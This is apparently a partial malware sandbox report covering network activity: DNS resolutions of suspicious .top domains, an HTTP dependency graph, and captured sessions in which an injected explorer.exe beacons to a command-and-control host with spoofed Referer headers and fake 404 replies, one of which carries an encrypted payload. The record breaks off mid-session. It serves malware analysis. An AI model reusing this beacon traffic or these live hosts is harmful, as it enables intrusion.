                                                  Oct 29, 2021 20:29:54.034465075 CEST8.8.8.8192.168.2.70x585eNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:54.201314926 CEST8.8.8.8192.168.2.70x64a1No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:54.373887062 CEST8.8.8.8192.168.2.70x649dNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:54.544733047 CEST8.8.8.8192.168.2.70x6bc6No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:54.722946882 CEST8.8.8.8192.168.2.70x9321No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:56.539890051 CEST8.8.8.8192.168.2.70x3837No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:56.710153103 CEST8.8.8.8192.168.2.70xfe70No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:56.885906935 CEST8.8.8.8192.168.2.70xae88No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:57.046030998 CEST8.8.8.8192.168.2.70x6041No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:57.213768005 CEST8.8.8.8192.168.2.70xe76eNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:59.875693083 CEST8.8.8.8192.168.2.70x5a82No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:00.314217091 CEST8.8.8.8192.168.2.70x4ffaNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:00.493067980 CEST8.8.8.8192.168.2.70x9edfNo error (0)sysaheu90.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:01.373661995 CEST8.8.8.8192.168.2.70xcd03No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:01.373661995 CEST8.8.8.8192.168.2.70xcd03No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:01.373661995 CEST8.8.8.8192.168.2.70xcd03No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:01.373661995 CEST8.8.8.8192.168.2.70xcd03No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:01.373661995 CEST8.8.8.8192.168.2.70xcd03No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:05.073163986 CEST8.8.8.8192.168.2.70x2096No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:05.314948082 CEST8.8.8.8192.168.2.70x6e42No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:06.139359951 CEST8.8.8.8192.168.2.70x54c6No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:06.443312883 CEST8.8.8.8192.168.2.70xf863No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:06.707096100 CEST8.8.8.8192.168.2.70x8c61No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.096445084 CEST8.8.8.8192.168.2.70x9b4No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.316358089 CEST8.8.8.8192.168.2.70x737dNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.528799057 CEST8.8.8.8192.168.2.70x828bNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.744049072 CEST8.8.8.8192.168.2.70xf0a3No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.971429110 CEST8.8.8.8192.168.2.70xae1eNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:10.332926989 CEST8.8.8.8192.168.2.70x7b34No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:11.577822924 CEST8.8.8.8192.168.2.70xd85dNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:11.771446943 CEST8.8.8.8192.168.2.70x12c8No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:15.547036886 CEST8.8.8.8192.168.2.70x14deName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:18.921991110 CEST8.8.8.8192.168.2.70xdc05Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:22.353709936 CEST8.8.8.8192.168.2.70x934dName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:27.903482914 CEST8.8.8.8192.168.2.70x5456Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:31.247653961 CEST8.8.8.8192.168.2.70xb3eeName error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:34.617084026 CEST8.8.8.8192.168.2.70x3ba2Name error (3)telegalive.topnonenoneA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:34.676328897 CEST8.8.8.8192.168.2.70x3666No error (0)toptelete.top172.67.160.46A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:34.676328897 CEST8.8.8.8192.168.2.70x3666No error (0)toptelete.top104.21.9.146A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:41.250916004 CEST8.8.8.8192.168.2.70xcc51No error (0)nusurtal4f.net45.141.84.21A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top151.251.30.69A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top58.124.228.242A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top5.163.179.4A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top176.123.228.234A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top186.74.208.84A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top211.119.84.112A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top189.129.196.81A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top196.200.111.5A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top91.203.174.38A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:42.035584927 CEST8.8.8.8192.168.2.70x59aeNo error (0)znpst.top89.46.29.238A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:31:13.148866892 CEST8.8.8.8192.168.2.70xaf84No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • cdn.discordapp.com
                                                  • rctoc.net
                                                    • hajezey1.top
                                                  • cufneavefi.net
                                                  • privacytoolzforyou-6000.top
                                                  • ctxsek.com
                                                  • ivcdxqts.com
                                                  • hqtrcnnq.org
                                                  • qhvnsfthad.org
                                                  • mwdvnqc.org
                                                  • rprqyk.org
                                                  • pjooem.net
                                                  • hfhoss.org
                                                  • hgdpvqs.net
                                                  • ryqdxjurg.net
                                                  • jjrxemk.com
                                                  • efeydlty.org
                                                  • glvslni.com
                                                  • jbxuhdvj.net
                                                  • axwrxhk.org
                                                  • dkannuwrja.org
                                                  • naytoe.com
                                                  • bggaruuq.net
                                                  • bcaielan.com
                                                  • sangssr.org
                                                  • eyepud.com
                                                  • dkvmgnfi.com
                                                  • wbdqtrry.com
                                                  • mkaqxiicba.net
                                                  • taupwpt.org
                                                  • blslkdmyqd.net
                                                  • chucxho.com
                                                  • futucrxk.com
                                                  • sysaheu90.top
                                                  • iyxlcdj.net
                                                  • ayllaycsn.com
                                                  • xcwoodah.org
                                                  • vtlkrwbu.com
                                                  • ohksryibbc.com
                                                  • aandk.com
                                                  • sbvoxgf.org
                                                  • qhsdwx.net
                                                  • akpvscwiwg.net
                                                  • fftaocheul.net
                                                  • uqktie.net
                                                  • tkhdy.net
                                                  • hhnkknumd.org
                                                  • toptelete.top
                                                  • 91.219.236.97

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.749773162.159.135.233443C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.749774162.159.135.233443C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  10192.168.2.749762185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:40.980958939 CEST1598OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://hqtrcnnq.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 243
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:41.059622049 CEST1599INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:41 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  11192.168.2.749763185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:41.144978046 CEST1600OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://qhvnsfthad.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 322
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:41.223545074 CEST1601INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:41 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  12192.168.2.749764185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:41.311482906 CEST1602OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://mwdvnqc.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 295
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:41.389851093 CEST1602INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:41 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 0
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  13192.168.2.749765185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:41.482006073 CEST1603OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://rprqyk.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 168
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:41.563502073 CEST1604INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:41 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 0
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  14192.168.2.749766185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:41.649980068 CEST1604OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://pjooem.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 125
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:41.733266115 CEST1606INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:41 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac ef 3f ef b2 a9 a6 cc b4 02 47 71 f5 66 3c 3d d0 9f cb 67 14 d8 97 24 c8 b9 fc f0 d4 e8 57 2d 88 d5 74 61 b4 7b 69 ad 66 43 80 1c b7 16 db 64 73 98 f5 51 cf 39 c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 07 1d 02 c1 b9 5a 97 82 fd 11 41 a6 b2 84 35 ce 39 83 ce 85 91 3e 94 d4 54 e5 2f 62 a2 22 27 c6 b9 0a d7 d9 1b c5 89 10 ee 8b ba d7 62 47 d8 ae 85 3a 9d 9b e1 d5 f5 de 38 7f 98 92 ff b0 6a 05 8f a5 0a 9f 36 6f 03 62 53 b5 f8 80 99 8b 84 80 3f 1d b8 3a c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 94 b6 07 e8 9a 4a 17 7a c5 42 14 7e 24 a0 84 ba 8b 65 7d bb 8e da 3b 33 f2 82 6c 27 b4 e3 e4 ce fd 5f 98 3b c4 fe da 3d 8f f5 3f 78 14 42 7b f9 e8 f0 85 a5 46 e5
                                                  Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|!@+%gt#+xQ<2P0YObyT=a'4 YU\nIXKg[Ge92)g z6@E}Wp0Mk"HI?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy_:-nD%GkKm@NQ>[J8-w,v"JG0Z"?kQTJMQId%\s$&Q#F<pvA>C/CbGB4VFv2Bbo;6HPgyPum6'NGc_,/DO9W%J}Tzl9\c=~"}h`1%@N!{K.iw]Ai/mv`pV>`|PTZ3z[ ^z&+(l%yw*C=;5"No?hs#9cw9iwN7&,X2wlH%f7-/^'Hg7+w&9c1P0{2%#49FwX?,SC;#vddOU^=i=p.oj"?Gqf<=g$W-ta{ifCdsQ9}p5CPZA59>T/b"'bG:8j6obS?:F/Mv#JzB~$e};3l'_;=?xB{F


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  15192.168.2.749767185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:43.683329105 CEST2137OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://hfhoss.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 268
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:43.760889053 CEST2138INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:43 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  16192.168.2.749768185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:43.854120016 CEST2139OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://hgdpvqs.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 142
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:43.934627056 CEST2140INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:43 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 0
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  17192.168.2.749769185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:44.016474009 CEST2140OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ryqdxjurg.net/
